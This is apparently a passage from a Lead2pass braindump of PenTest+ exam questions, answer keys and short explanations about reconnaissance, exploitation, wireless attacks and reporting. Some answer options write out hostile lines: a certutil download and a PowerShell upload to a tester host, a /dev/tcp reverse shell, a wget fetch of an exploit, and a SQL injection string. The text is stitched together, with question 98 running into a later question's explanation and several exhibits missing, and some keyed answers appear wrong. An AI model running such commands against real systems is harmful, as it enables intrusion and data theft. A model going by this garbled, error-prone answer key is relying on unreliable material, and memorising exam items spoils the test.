the security company have acquired BEFORE the start of the assessment? A. A signed statement of work B. The correct user accounts and associated passwords C. The expected time frame of the assessment D. The proper emergency contacts for the client Answer: D Explanation: It was known that this needed to happen, therefore this must have been determined. The issue is that this condition could not be met, but the team had no way to notify the client. QUESTION 64 A penetration tester has obtained a low-privilege shell on a Windows server with a default configuration and now wants to explore the ability to exploit misconfigured service permissions. Which of the following commands would help the tester START this process? A. certutil -urlcache -split -f http://192.168.2.124/windows-binaries/ accesschk64.exe B. powershell (New-Object System.Net.WebClient).UploadFile(`http://192.168.2.124/upload.php', `systeminfo.txt') C. schtasks /query /fo LIST /v | find /I "Next Run Time:" D. wget http://192.168.2.124/windows-binaries/accesschk64.exe -O accesschk64.exe Answer: A Explanation: Get Latest & Actual PT0-002 Exam's Question and Answers from Lead2pass. 30 https://www.lead2pass.com https://www.bleepingcomputer.com/news/security/certutilexe-could-allow-attackers-to-download- malware-while-bypassing-av/ https://docs.microsoft.com/en-us/sysinternals/downloads/accesschk QUESTION 65 Which of the following protocols or technologies would provide in-transit confidentiality protection for emailing the final security assessment report? A. S/MIME B. FTPS C. DNSSEC D. AS2 Answer: A Explanation: https://searchsecurity.techtarget.com/answer/What-are-the-most-important-email-security- protocols QUESTION 66 A penetration tester recently completed a review of the security of a core network device within a corporate environment. The key findings are as follows: - The following request was intercepted going to the network device: GET /login HTTP/1.1 Host: 10.50.100.16 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Accept- Language: en-US,en;q=0.5 Connection: keep-alive Authorization: Basic WU9VUilOQU1FOnNlY3JldHBhc3N3b3jk - Network management interfaces are available on the production network. - An Nmap scan returned the following: Which of the following would be BEST to add to the recommendations section of the final report? (Choose two.) A. Enforce enhanced password complexity requirements. B. Disable or upgrade SSH daemon. C. Disable HTTP/301 redirect configuration. D. Create an out-of-band network for management. E. Implement a better method for authentication. F. Eliminate network management and control interfaces. Answer: CD Get Latest & Actual PT0-002 Exam's Question and Answers from Lead2pass. 31 https://www.lead2pass.com QUESTION 67 A penetration tester ran a ping -A command during an unknown environment test, and it returned a 128 TTL packet. Which of the following OSs would MOST likely return a packet of this type? A. Windows B. Apple C. Linux D. Android Answer: A Explanation: https://www.freecodecamp.org/news/how-to-identify-basic-internet-problems-with-ping/ QUESTION 68 A penetration tester who is doing a company-requested assessment would like to send traffic to another system using double tagging. Which of the following techniques would BEST accomplish this goal? A. RFID cloning B. RFID tagging C. Meta tagging D. Tag nesting Answer: D Explanation: Since vlan hopping requires 2 vlans to be nested in a single packet. Double tagging occurs when an attacker adds and modifies tags on an Ethernet frame to allow the sending of packets through any VLAN. This attack takes advantage of how many switches process tags. Most switches will only remove the outer tag and forward the frame to all native VLAN ports. With that said, this exploit is only successful if the attacker belongs to the native VLAN of the trunk link. https://cybersecurity.att.com/blogs/security-essentials/vlan-hopping-and-mitigation QUESTION 69 A penetration tester is exploring a client's website. The tester performs a curl command and obtains the following: Get Latest & Actual PT0-002 Exam's Question and Answers from Lead2pass. 32 https://www.lead2pass.com Which of the following tools would be BEST for the penetration tester to use to explore this site further? A. Burp Suite B. DirBuster C. WPScan D. OWASP ZAP Answer: C Explanation: WPScan is a WordPress site vulnerability scanner that identifies the plugins used by the website against a database of known vulnerabilities. QUESTION 70 A penetration tester wrote the following script to be used in one engagement: Get Latest & Actual PT0-002 Exam's Question and Answers from Lead2pass. 33 https://www.lead2pass.com Which of the following actions will this script perform? A. Look for open ports. B. Listen for a reverse shell. C. Attempt to flood open ports. D. Create an encrypted tunnel. Answer: A Explanation: The last print statement gives away the answer. It explicitly shows that they're returning the ports found to be open. QUESTION 71 The results of an Nmap scan are as follows: Which of the following device types will MOST likely have a similar response? (Choose two.) Get Latest & Actual PT0-002 Exam's Question and Answers from Lead2pass. 34 https://www.lead2pass.com A. Network device B. Public-facing web server C. Active Directory domain controller D. IoT/embedded device E. Exposed RDP F. Print queue Answer: BD QUESTION 72 A penetration tester conducted an assessment on a web server. The logs from this session show the following: Which of the following attacks is being attempted? A. Clickjacking B. Session hijacking C. Parameter pollution D. Cookie hijacking E. Cross-site scripting Answer: C Explanation: All input validation flaws are caused by unsanitized data flows between the front-end and the several back-ends of a web application. HTTP Parameter Pollution (HPP) attacks can be defined as the feasibility to override or add HTTP GET/POST parameters by injecting query string delimiters. Regular attack: http://webApplication/showproducts.asp?prodID=9 UNION SELECT 1,2,3 FROM Users WHERE id=3 — Source: https://owasp.org/www-pdf-archive/AppsecEU09_CarettoniDiPaola_v0.8.pdf QUESTION 73 An assessment has been completed, and all reports and evidence have been turned over to the client. Which of the following should be done NEXT to ensure the confidentiality of the client's information? A. Follow the established data retention and destruction process B. Report any findings to regulatory oversight groups C. Publish the findings after the client reviews the report D. Encrypt and store any client information for future analysis Answer: D QUESTION 74 During a penetration-testing engagement, a consultant performs reconnaissance of a client to identify potential targets for a phishing campaign. Get Latest & Actual PT0-002 Exam's Question and Answers from Lead2pass. 35 https://www.lead2pass.com Which of the following would allow the consultant to retrieve email addresses for technical and billing contacts quickly, without triggering any of the client's cybersecurity tools? (Choose two.) A. Scraping social media sites B. Using the WHOIS lookup tool C. Crawling the client's website D. Phishing company employees E. Utilizing DNS lookup tools F. Conducting wardriving near the client facility Answer: AC Explanation: Technical and billing addresses are usually posted on company websites and company social media sites for the their clients to access. The WHOIS lookup will only avail info for the company registrant, an abuse email contact, etc but it may not contain details for billing addresses. QUESTION 75 A penetration tester was able to gain access to a system using an exploit. The following is a snippet of the code that was utilized: Which of the following commands should the penetration tester run post-engagement? A. grep -v apache ~/.bash_history > ~/.bash_history B. rm -rf /tmp/apache C. chmod 600 /tmp/apache D. taskkill /IM "apache" /F Answer: B Explanation: The apache folder in tmp was added by the tester, therefore, it's right for him to clean it up. QUESTION 76 Which of the following describe the GREATEST concerns about using third-party open-source libraries in application code? (Choose two.) A. The libraries may be vulnerable B. The licensing of software is ambiguous C. The libraries' code bases could be read by anyone D. The provenance of code is unknown E. The libraries may be unsupported F. The libraries may break the application Answer: AC Explanation: https://www.infosecurity-magazine.com/opinions/third-party-libraries-the-swiss/ Get Latest & Actual PT0-002 Exam's Question and Answers from Lead2pass. 36 https://www.lead2pass.com QUESTION 77 A penetration tester is preparing to perform activities for a client that requires minimal disruption to company operations. Which of the following are considered passive reconnaissance tools? (Choose two.) A. Wireshark B. Nessus C. Retina D. Burp Suite E. Shodan F. Nikto Answer: AE Explanation: https://resources.infosecinstitute.com/topic/top-10-network-recon-tools/ QUESTION 78 Get Latest & Actual PT0-002 Exam's Question and Answers from Lead2pass. 37 https://www.lead2pass.com A consultant is reviewing the following output after reports of intermittent connectivity issues: Which of the following is MOST likely to be reported by the consultant? A. A device on the network has an IP address in the wrong subnet. B. A multicast session was initiated using the wrong multicast group. C. An ARP flooding attack is using the broadcast address to perform DDoS. D. A device on the network has poisoned the ARP cache. Answer: D Explanation: The gateway for the network (192.168.1.1) is at 0a:d1:fa:b1:01:67, and then, another machine (192.168.1.136) also claims to be on the same MAC address. With this on the same network, intermittent connectivity will be inevitable as along as the gateway remains unreachable on the IP known by the others machines on the network, and given that the new machine claiming to be the gateway has not been configured to route traffic. QUESTION 79 Which of the following BEST describe the OWASP Top 10? (Choose two.) A. The most critical risks of web applications B. A list of all the risks of web applications C. The risks defined in order of importance D. A web-application security standard E. A risk-governance and compliance framework F. A checklist of Apache vulnerabilities Answer: AC Explanation: Get Latest & Actual PT0-002 Exam's Question and Answers from Lead2pass. 38 https://www.lead2pass.com https://www.synopsys.com/glossary/what-is-owasp-top-10.html QUESTION 80 A penetration tester conducted a discovery scan that generated the following: Which of the following commands generated the results above and will transform them into a list of active hosts for further analysis? A. nmap -oG list.txt 192.168.0.1-254 , sort B. nmap -sn 192.168.0.1-254 , grep "Nmap scan" | awk `{print S5}' C. nmap --open 192.168.0.1-254, uniq D. nmap -o 192.168.0.1-254, cut -f 2 Answer: B Explanation: Get Latest & Actual PT0-002 Exam's Question and Answers from Lead2pass. 39 https://www.lead2pass.com Since those results are from host discovery (-sn) and no ports are reported. AWK command is used in combination with grep to manipulate the output. QUESTION 81 A penetration tester has been contracted to review wireless security. The tester has deployed a malicious wireless AP that mimics the configuration of the target enterprise WiFi. The penetration tester now wants to try to force nearby wireless stations to connect to the malicious AP. Which of the following steps should the tester take NEXT? A. Send deauthentication frames to the stations. B. Perform jamming on all 2.4GHz and 5GHz channels. C. Set the malicious AP to broadcast within dynamic frequency selection channels. D. Modify the malicious AP configuration to not use a pre-shared key. Answer: A Explanation: Jamming the signal would cause a DDos and other frequencies could possibly interfere with other WAPs in the area that don't belong to the customer. QUESTION 82 A security engineer identified a new server on the network and wants to scan the host to determine if it is running an approved version of Linux and a patched version of Apache. Which of the following commands will accomplish this task? A. nmap -f -sV -p80 192.168.1.20 B. nmap -sS -sL -p80 192.168.1.20 C. nmap -A -T4 -p80 192.168.1.20 D. nmap -O -v -p80 192.168.1.20 Answer: C Explanation: The only Nmap arguments used in this example are -A, to enable OS and version detection, script scanning, and traceroute; -T4 for faster execution; and then the two target hostnames. https://manpages.org/nmap QUESTION 83 Which of the following expressions in Python increase a variable val by one (Choose two.) A. val++ B. +val C. val=(val+1) D. ++val E. val=val++ F. val+=1 Answer: CF Explanation: https://pythonguides.com/increment-and-decrement-operators-in-python/ QUESTION 84 Get Latest & Actual PT0-002 Exam's Question and Answers from Lead2pass. 40 https://www.lead2pass.com A company conducted a simulated phishing attack by sending its employees emails that included a link to a site that mimicked the corporate SSO portal. Eighty percent of the employees who received the email clicked the link and provided their corporate credentials on the fake site. Which of the following recommendations would BEST address this situation? A. Implement a recurring cybersecurity awareness education program for all users. B. Implement multifactor authentication on all corporate applications. C. Restrict employees from web navigation by defining a list of unapproved sites in the corporate proxy. D. Implement an email security gateway to block spam and malware from email communications. Answer: A Explanation: https://resources.infosecinstitute.com/topic/top-9-free-phishing-simulators/ QUESTION 85 A security professional wants to test an IoT device by sending an invalid packet to a proprietary service listening on TCP port 3011. Which of the following would allow the security professional to easily and programmatically manipulate the TCP header length and checksum using arbitrary numbers and to observe how the proprietary service responds? A. Nmap B. tcpdump C. Scapy D. hping3 Answer: C Explanation: Scaly is a powerful interactive packet manipulation program. It replaces tools such as hping, 85% of nmap, arpspoof, arp-sk, arping, tcpdump, Tshark, p0f and others. QUESTION 86 A penetration tester is reviewing the following SOW prior to engaging with a client: "Network diagrams, logical and physical asset inventory, and employees' names are to be treated as client confidential. Upon completion of the engagement, the penetration tester will submit findings to the client's Chief Information Security Officer (CISO) via encrypted protocols and subsequently dispose of all findings by erasing them in a secure manner." Based on the information in the SOW, which of the following behaviors would be considered unethical? (Choose two.) A. Utilizing proprietary penetration-testing tools that are not available to the public or to the client for auditing and inspection B. Utilizing public-key cryptography to ensure findings are delivered to the CISO upon completion of the engagement C. Failing to share with the client critical vulnerabilities that exist within the client architecture to appease the client's senior leadership team D. Seeking help with the engagement in underground hacker forums by sharing the client's public IP address E. Using a software-based erase tool to wipe the client's findings from the penetration tester's laptop F. Retaining the SOW within the penetration tester's company for future use so the sales team can Get Latest & Actual PT0-002 Exam's Question and Answers from Lead2pass. 41 https://www.lead2pass.com plan future engagements Answer: CD QUESTION 87 A company recruited a penetration tester to configure wireless IDS over the network. Which of the following tools would BEST test the effectiveness of the wireless IDS solutions? A. Aircrack-ng B. Wireshark C. Wifite D. Kismet Answer: A Explanation: https://purplesec.us/perform-wireless-penetration-test/ QUESTION 88 A penetration tester gains access to a system and establishes persistence, and then runs the following commands: Which of the following actions is the tester MOST likely performing? A. Redirecting Bash history to /dev/null B. Making a copy of the user's Bash history for further enumeration C. Covering tracks by clearing the Bash history D. Making decoy files on the system to confuse incident responders Answer: C Explanation: https://null-byte.wonderhowto.com/how-to/clear-logs-bash-history-hacked-linux-systems-cover- your-tracks-remain-undetected-0244768/ QUESTION 89 Which of the following web-application security risks are part of the OWASP Top 10 v2017? (Choose two.) A. Buffer overflows B. Cross-site scripting C. Race-condition attacks D. Zero-day attacks E. Injection flaws F. Ransomware attacks Answer: BE Get Latest & Actual PT0-002 Exam's Question and Answers from Lead2pass. 42 https://www.lead2pass.com Explanation: The 2017 owasp top 10 list has these items: A01-Injection A02-Broken Authentication A03-Sensitive Data Exposure A04-XXE A05-Broken Access Control A06-Security Misconfiguration A07-XSS A08-Insecure Deserialization A09-Using Components with Known Vulnerabilities A10-Insufficient Logging & Monitoring QUESTION 90 A red team gained access to the internal network of a client during an engagement and used the Responder tool to capture important data. Which of the following was captured by the testing team? A. Multiple handshakes B. IP addresses C. Encrypted file transfers D. User hashes sent over SMB Answer: D Explanation: Responder: A toolkit to respond to NetBIOS name service queries for file server service requests using the Server Message Block (SMB) protocol. QUESTION 91 Running a vulnerability scanner on a hybrid network segment that includes general IT servers and industrial control systems: A. will reveal vulnerabilities in the Modbus protocol. B. may cause unintended failures in control systems. C. may reduce the true positive rate of findings. D. will create a denial-of-service condition on the IP networks. Answer: B Explanation: https://www.hsdl.org/?view&did=7262 QUESTION 92 An Nmap network scan has found five open ports with identified services. Which of the following tools should a penetration tester use NEXT to determine if any vulnerabilities with associated exploits exist on the open ports? A. OpenVAS B. Drozer C. Burp Suite D. OWASP ZAP Get Latest & Actual PT0-002 Exam's Question and Answers from Lead2pass. 43 https://www.lead2pass.com Answer: A Explanation: OpenVAS is a full-featured vulnerability scanner. OWASP ZAP = Burp Suite Drozer (Android) = drozer allows you to search for security vulnerabilities in apps and devices by assuming the role of an app and interacting with the Dalvik VM, other apps' IPC endpoints and the underlying OS. QUESTION 93 A penetration tester would like to obtain FTP credentials by deploying a workstation as an on- path attack between the target and the server that has the FTP protocol. Which of the following methods would be the BEST to accomplish this objective? A. Wait for the next login and perform a downgrade attack on the server. B. Capture traffic using Wireshark. C. Perform a brute-force attack over the server. D. Use an FTP exploit against the server. Answer: B Explanation: FTP is not a secure protocol so your user name and password is in clear text. QUESTION 94 Penetration-testing activities have concluded, and the initial findings have been reviewed with the client. Which of the following best describes the NEXT step in the engagement? A. Acceptance by the client and sign-off on the final report B. Scheduling of follow-up actions and retesting C. Attestation of findings and delivery of the report D. Review of the lessons learned during the engagement Answer: A Explanation: The next step in the engagement after reviewing the initial findings with the client would typically be the acceptance by the client and sign-off on the final report (option A). After the client has reviewed and accepted the final report, the next step could be scheduling follow-up actions and retesting (option B) to ensure that any vulnerabilities or weaknesses identified during the penetration testing have been properly addressed and mitigated. Option C, attestation of findings and delivery of the report, may also be a necessary step depending on the specific requirements of the engagement. Option D, review of the lessons during the engagement, could also be an important step to ensure that the insights and lessons learned during the engagement are properly documented and shared with relevant stakeholders. QUESTION 95 A penetration tester discovered a vulnerability that provides the ability to upload to a path via directory traversal. Some of the files that were discovered through this vulnerability are: Get Latest & Actual PT0-002 Exam's Question and Answers from Lead2pass. 44 https://www.lead2pass.com Which of the following is the BEST method to help an attacker gain internal access to the affected machine? A. Edit the discovered file with one line of code for remote callback B. Download.pl files and look for usernames and passwords C. Edit the smb.conf file and upload it to the server D. Download the smb.conf file and look at configurations Answer: A Explanation: The SMB.conf file won't give you internal access to the system, it would only be effective for Remote File Inclusion (RFI) which has already been achieved. QUESTION 96 A penetration tester has established an on-path attack position and must now specially craft a DNS query response to be sent back to a target host. Which of the following utilities would BEST support this objective? A. Socat B. tcpdump C. Scapy D. dig Answer: C Explanation: Before you can forward the packet you need to create it, you can create packets using Scapy. https://thepacketgeek.com/scapy/building-network-tools/part-09/ QUESTION 97 A penetration tester ran the following command on a staging server: python -m SimpleHTTPServer 9891 Which of the following commands could be used to download a file named exploit to a target machine for execution? A. nc 10.10.51.50 9891 < exploit B. powershell -exec bypass -f \\10.10.51.50\9891 C. bash -i >& /dev/tcp/10.10.51.50/9891 0&1>/exploit D. wget 10.10.51.50:9891/exploit Answer: D Explanation: https://www.redhat.com/sysadmin/simple-http-server "Another option is to use wget or curl to download the files to the remote system. Get Latest & Actual PT0-002 Exam's Question and Answers from Lead2pass. 45 https://www.lead2pass.com wget http://:8000/filename curl http://:8000/filename " QUESTION 98 When developing a shell script intended for interpretation in Bash, the interpreter /bin/bash should be explicitly specified. Which of the following character combinations should be used on the first line of the script to accomplish this goal? A. specifies NetNTLMv2 as the hash type -a 3 --> specifies a mask attack, hash.txt --> file containing the hashes ?a?a?a?a?a?a?a?a --> this particular mask will attempt to bruteforce an 8 character password where all characters can be uppercase, lowercase, digits and can have space, symbols, etc. QUESTION 129 A penetration tester has been asked to conduct a penetration test on a REST-based web service. Which of the following items is required? A. The latest vulnerability scan results B. A list of sample application requests C. An up-to-date list of possible exploits D. A list of sample test accounts Get Latest & Actual PT0-002 Exam's Question and Answers from Lead2pass. 58 https://www.lead2pass.com Answer: B Explanation: https://cheatsheetseries.owasp.org/cheatsheets/REST_Assessment_Cheat_Sheet.html QUESTION 130 A penetration tester is preparing to conduct API testing. Which of the following would be MOST helpful in preparing for this engagement? A. Nikto B. WAR C. W3AF D. Swagger Answer: D Explanation: Swagger is an open specification for defining REST APIs. A Swagger document is the REST API equivalent of a WSDL document for a SOAP-based web service. The Swagger document specifies the list of resources that are available in the REST API and the operations that can be called on those resources. It also specifies the list of parameters to an operation, including the name and type of the parameters, whether the parameters are required or optional, and information about acceptable values for those parameters. So, access to a Swagger document provides testers with a good view of how the API works and thus how they can test it. QUESTION 131 Drag and Drop Question Instructions: Analyze the code segments to determine which sections are needed to complete a port scanning script. Drag the appropriate elements into the correct locations to complete the script. If at any time you would like to bring back the initial state of the simulation, please click the reset all button. During a penetration test, you gain access to a system with a limited user interface. This machine appears to have access to an isolated network that you would like to port scan. Get Latest & Actual PT0-002 Exam's Question and Answers from Lead2pass. 59 https://www.lead2pass.com Answer: Get Latest & Actual PT0-002 Exam's Question and Answers from Lead2pass. 60 https://www.lead2pass.com Get Latest & Actual PT0-002 Exam's Question and Answers from Lead2pass. 61 https://www.lead2pass.com QUESTION 132 Which of the following commands will allow a penetration tester to permit a shell script to be executed by the file owner? A. chmod u+x script.sh B. chmod u+e script.sh C. chmod o+e script.sh D. chmod o+x script.sh Answer: A Explanation: https://newbedev.com/chmod-u-x-versus-chmod-x QUESTION 133 A compliance-based penetration test is primarily concerned with: A. obtaining PII from the protected network. B. bypassing protection on edge devices. C. determining the efficacy of a specific set of security standards. D. obtaining specific information from the protected network. Answer: C QUESTION 134 A penetration tester is explaining the MITRE ATT&CK framework to a company’s chief legal counsel. Which of the following would the tester MOST likely describe as a benefit of the framework? A. Understanding the tactics of a security intrusion can help disrupt them. B. Scripts that are part of the framework can be imported directly into SIEM tools. C. The methodology can be used to estimate the cost of an incident better. D. The framework is static and ensures stability of a security program over time. Answer: A Explanation: Get Latest & Actual PT0-002 Exam's Question and Answers from Lead2pass. 62 https://www.lead2pass.com https://attack.mitre.org/ QUESTION 135 A company has hired a penetration tester to deploy and set up a rogue access point on the network. Which of the following is the BEST tool to use to accomplish this goal? A. Wireshark B. Aircrack-ng C. Kismet D. Wifite Answer: B Explanation: The othe options are basically sniffers and cannot be used to create a rogue AP/evil twin. Aircrack-ng. This program is a suite of wireless penetration testing tools, including airbase-ng, aircrack-ng, airdecap-ng, airdecloak-ng, airdrop-ng, aireplay-ng, airmon-ng, airodump-ng, and much more. QUESTION 136 A company obtained permission for a vulnerability scan from its cloud service provider and now wants to test the security of its hosted data. Which of the following should the tester verify FIRST to assess this risk? A. Whether sensitive client data is publicly accessible B. Whether the connection between the cloud and the client is secure C. Whether the client’s employees are trained properly to use the platform D. Whether the cloud applications were developed using a secure SDLC Answer: A Get Latest & Actual PT0-002 Exam's Question and Answers from Lead2pass. 63 https://www.lead2pass.com QUESTION 137 A Chief Information Security Officer wants a penetration tester to evaluate the security awareness level of the company’s employees. Which of the following tools can help the tester achieve this goal? A. Metasploit B. Hydra C. SET D. WPScan Answer: C Explanation: Social Engineering Toolkit is a way to test your employees security awareness. QUESTION 138 Which of the following is the MOST common vulnerability associated with IoT devices that are directly connected to the Internet? A. Unsupported operating systems B. Susceptibility to DDoS attacks C. Inability to network D. The existence of default passwords Answer: D Explanation: The IoT provides a unique opportunity for manufacturers to build devices with the ability to communicate and perform specialized functions. However, because of the lack of rigorous testing, many devices have several insecure defaults that come preconfigured, such as the username and password. In many cases, the manufacturer has hard-coded these credentials and made them very difficult or impossible to remove. This can be dangerous, as once a malicious actor knows the type of device that is in use, they can then research the default username and password online. As a result, the team should research the default credentials for each IoT product you target during the PenTest. QUESTION 139 Which of the following describes the reason why a penetration tester would run the command sdelete mimikatz. * on a Windows server that the tester compromised? A. To remove hash-cracking registry entries B. To remove the tester-created Mimikatz account C. To remove tools from the server D. To remove a reverse shell from the system Answer: C Explanation: SDelete is a command line utility that takes a number of options. In any given use, it allows you to delete one or more files and/or directories, or to cleanse the free space on a logical disk. SDelete accepts wild card characters as part of the directory or file specifier. Get Latest & Actual PT0-002 Exam's Question and Answers from Lead2pass. 64 https://www.lead2pass.com QUESTION 140 A penetration tester was brute forcing an internal web server and ran a command that produced the following output: However, when the penetration tester tried to browse the URL http://172.16.100.10:3000/profile, a blank page was displayed. Which of the following is the MOST likely reason for the lack of output? A. The HTTP port is not open on the firewall. B. The tester did not run sudo before the command. C. The web server is using HTTPS instead of HTTP. D. This URI returned a server error. Answer: D Explanation: If the firewall was blocking the port than none of the web directories would have successful (200 codes) the 500 code is a server side error code meaning the correct answer is D. QUESTION 141 An Nmap scan shows open ports on web servers and databases. A penetration tester decides to run WPScan and SQLmap to identify vulnerabilities and additional information about those systems. Which of the following is the penetration tester trying to accomplish? Get Latest & Actual PT0-002 Exam's Question and Answers from Lead2pass. 65 https://www.lead2pass.com A. Uncover potential criminal activity based on the evidence gathered. B. Identify all the vulnerabilities in the environment. C. Limit invasiveness based on scope. D. Maintain confidentiality of the findings. Answer: C QUESTION 142 A company hired a penetration tester to do a social-engineering test against its employees. Although the tester did not find any employees’ phone numbers on the company’s website, the tester has learned the complete phone catalog was published there a few months ago. In which of the following places should the penetration tester look FIRST for the employees’ numbers? A. Web archive B. GitHub C. File metadata D. Underground forums Answer: A QUESTION 143 A penetration tester completed a vulnerability scan against a web server and identified a single but severe vulnerability. Which of the following is the BEST way to ensure this is a true positive? A. Run another scanner to compare. B. Perform a manual test on the server. C. Check the results on the scanner. D. Look for the vulnerability online. Answer: B QUESTION 144 A company’s Chief Executive Officer has created a secondary home office and is concerned that the WiFi service being used is vulnerable to an attack. A penetration tester is hired to test the security of the WiFi’s router. Which of the following is MOST vulnerable to a brute-force attack? A. WPS B. WPA2-EAP C. WPA-TKIP D. WPA2-PSK Answer: A Explanation: Get Latest & Actual PT0-002 Exam's Question and Answers from Lead2pass. 66 https://www.lead2pass.com The problem with WPS is that the WPS - enabled router is vulnerable to having the WPS cracked due to the fact that the pin was originally designed as two 4-pin blocks. It is much quicker to crack two 4-pin blocks than it is one 8-pin block. It has been found that hackers can brute force each of the two 4-digit blocks within hours and then use the PIN to connect to the WPA or WPA2 protected network. QUESTION 145 A penetration tester ran the following commands on a Windows server: Which of the following should the tester do AFTER delivering the final report? A. Delete the scheduled batch job. B. Close the reverse shell connection. C. Downgrade the svsaccount permissions. D. Remove the tester-created credentials. Answer: D Explanation: svsaccount was created and then added to Administrators; this appended into the batchjob. Runas is like sudo. QUESTION 146 A penetration tester is starting an assessment but only has publicly available information about the target company. The client is aware of this exercise and is preparing for the test. Which of the following describes the scope of the assessment? A. Partially known environment testing B. Known environment testing C. Unknown environment testing D. Physical environment testing Answer: C QUESTION 147 The following line-numbered Python code snippet is being used in reconnaissance: Get Latest & Actual PT0-002 Exam's Question and Answers from Lead2pass. 67 https://www.lead2pass.com Which of the following line numbers from the script MOST likely contributed to the script triggering a `probable port scan` alert in the organization's IDS? A. Line 01 B. Line 02 C. Line 07 D. Line 08 E. Line 12 Answer: D Explanation: 0.01 s is a super short and unusual setting for a timeout. QUESTION 148 A consulting company is completing the ROE during scoping. Which of the following should be included in the ROE? A. Cost of the assessment B. Report distribution C. Testing restrictions D. Liability Answer: C Explanation: The Rules of Engagement, or ROE, are meant to list out the specifics of your penetration testing project to ensure that both the client and the engineers working on a project know exactly what is being testing, when its being tested, and how its being tested. QUESTION 149 A new client hired a penetration-testing company for a month-long contract for various security assessments against the client’s new service. The client is expecting to make the new service publicly available shortly after the assessment is complete and is planning to fix any findings, except for critical issues, after the service is made public. The client wants a simple report structure and does not want to receive daily findings. Get Latest & Actual PT0-002 Exam's Question and Answers from Lead2pass. 68 https://www.lead2pass.com Which of the following is most important for the penetration tester to define FIRST? A. Establish the format required by the client. B. Establish the threshold of risk to escalate to the client immediately. C. Establish the method of potential false positives. D. Establish the preferred day of the week for reporting. Answer: B QUESTION 150 A penetration tester has been hired to perform a physical penetration test to gain access to a secure room within a client’s building. Exterior reconnaissance identifies two entrances, a WiFi guest network, and multiple security cameras connected to the Internet. Which of the following tools or techniques would BEST support additional reconnaissance? A. Wardriving B. Shodan C. Recon-ng D. Aircrack-ng Answer: C Explanation: Third-party information sources and tools support passive intelligence gathering. Open-source intelligence gathering relies on a broad range of tools and services. These include search engines like Shodan and Censys, automated information-gathering tools like theHarvester, Recon-ng, Maltego, and FOCA, and databases and information stores like WHOIS records, public records, social media, and other information sources. QUESTION 151 A penetration tester conducts an Nmap scan against a target and receives the following results: Which of the following should the tester use to redirect the scanning tools using TCP port 1080 on the target? A. Nessus B. ProxyChains C. OWASP ZAP D. Empire Answer: B Explanation: https://www.codeproject.com/Tips/634228/How-to-Use-Proxychains-Forwarding-Ports QUESTION 152 Get Latest & Actual PT0-002 Exam's Question and Answers from Lead2pass. 69 https://www.lead2pass.com A penetration tester received a.pcap file to look for credentials to use in an engagement. Which of the following tools should the tester utilize to open and read the.pcap file? A. Nmap B. Wireshark C. Metasploit D. Netcat Answer: B Explanation: The.pcap file extension is mainly associated with Wireshark; a program used for analyzing networks..pcap files are data files created using the program and they contain the packet data of a network. These files are mainly used in analyzing the network characteristics of a certain data. These files also contribute to successfully controlling traffic of a certain network since they are being monitored by the program. QUESTION 153 A penetration tester has been given an assignment to attack a series of targets in the 192.168.1.0/24 range, triggering as few alarms and countermeasures as possible. Which of the following Nmap scan syntaxes would BEST accomplish this objective? A. nmap -sT -vvv -O 192.168.1.2/24 -PO B. nmap -sV 192.168.1.2/24 -PO C. nmap -sA -v -O 192.168.1.2/24 D. nmap -sS -O 192.168.1.2/24 -T1 Answer: D Explanation: https://nmap.org/book/man-port-scanning-techniques.html QUESTION 154 A penetration tester has gained access to a network device that has a previously unknown IP range on an interface. Further research determines this is an always-on VPN tunnel to a third- party supplier. Which of the following is the BEST action for the penetration tester to take? A. Utilize the tunnel as a means of pivoting to other internal devices. B. Disregard the IP range, as it is out of scope. Get Latest & Actual PT0-002 Exam's Question and Answers from Lead2pass. 70 https://www.lead2pass.com C. Stop the assessment and inform the emergency contact. D. Scan the IP range for additional systems to exploit. Answer: C Explanation: Critical findings The first communication trigger is known as critical findings. A critical finding occurs when, during a pentest, you come across a critical or major vulnerability in a system that has the customer wide open to an attack. In this case you do not want to wait to communicate this important finding to the customer in the final report; you should stop the pentest immediately and talk to the stakeholder about the critical finding and determine how you are to proceed. QUESTION 155 A penetration tester recently performed a social-engineering attack in which the tester found an employee of the target company at a local coffee shop and over time built a relationship with the employee. On the employee’s birthday, the tester gave the employee an external hard drive as a gift. Which of the following social-engineering attacks was the tester utilizing? A. Phishing B. Tailgating C. Baiting D. Shoulder surfing Answer: C Explanation: https://phoenixnap.com/blog/what-is-social-engineering-types-of- QUESTION 156 A security company has been contracted to perform a scoped insider-threat assessment to try to Get Latest & Actual PT0-002 Exam's Question and Answers from Lead2pass. 71 https://www.lead2pass.com gain access to the human resources server that houses PII and salary data. The penetration testers have been given an internal network starting position. Which of the following actions, if performed, would be ethical within the scope of the assessment? A. Exploiting a configuration weakness in the SQL database B. Intercepting outbound TLS traffic C. Gaining access to hosts by injecting malware into the enterprise-wide update server D. Leveraging a vulnerability on the internal CA to issue fraudulent client certificates E. Establishing and maintaining persistence on the domain controller Answer: A QUESTION 157 A penetration tester is able to capture the NTLM challenge-response traffic between a client and a server. Which of the following can be done with the pcap to gain access to the server? A. Perform vertical privilege escalation. B. Replay the captured traffic to the server to recreate the session. C. Use John the Ripper to crack the password. D. Utilize a pass-the-hash attack. Answer: B QUESTION 158 Which of the following protocols or technologies would in-transit confidentially protection for emailing the final security assessment report? A. S/MIME B. FTPS C. DNSSEC D. AS2 Answer: A QUESTION 159 A penetration tester was able to gather MD5 hashes from a server and crack the hashes easily with rainbow tables. Which of the following should be included as a recommendation in the remediation report? A. Stronger algorithmic requirements B. Access controls on the server C. Encryption on the user passwords D. A patch management program Answer: A Get Latest & Actual PT0-002 Exam's Question and Answers from Lead2pass. 72 https://www.lead2pass.com QUESTION 160 A penetration tester found the following valid URL while doing a manual assessment of a web application: http://www.example.com/product.php?id=123987. Which of the following automated tools would be best to use NEXT to try to identify a vulnerability in this URL? A. SQLmap B. Nessus C. Nikto D. DirBuster Answer: C Explanation: Nikto is an open-source web application vulnerability scanner. When you run it against a website or web application, Nikto performs a number of tests to determine if the web application is vulnerable to different types of attacks. QUESTION 161 A penetration tester is attempting to discover live hosts on a subnet quickly. Which of the following commands will perform a ping scan? A. nmap -sn 10.12.1.0/24 B. nmap -sV -A 10.12.1.0/24 C. nmap -Pn 10.12.1.0/24 D. nmap -sT -p- 10.12.1.0/24 Answer: A Explanation: Get Latest & Actual PT0-002 Exam's Question and Answers from Lead2pass. 73 https://www.lead2pass.com https://www.tecmint.com/find-live-hosts-ip-addresses-on-linux-network/ QUESTION 162 Which of the following tools would be MOST useful in collecting vendor and other security- relevant information for IoT devices to support passive reconnaissance? A. Shodan B. Nmap C. WebScarab-NG D. Nessus Answer: A Explanation: Shodan is a search engine that collects 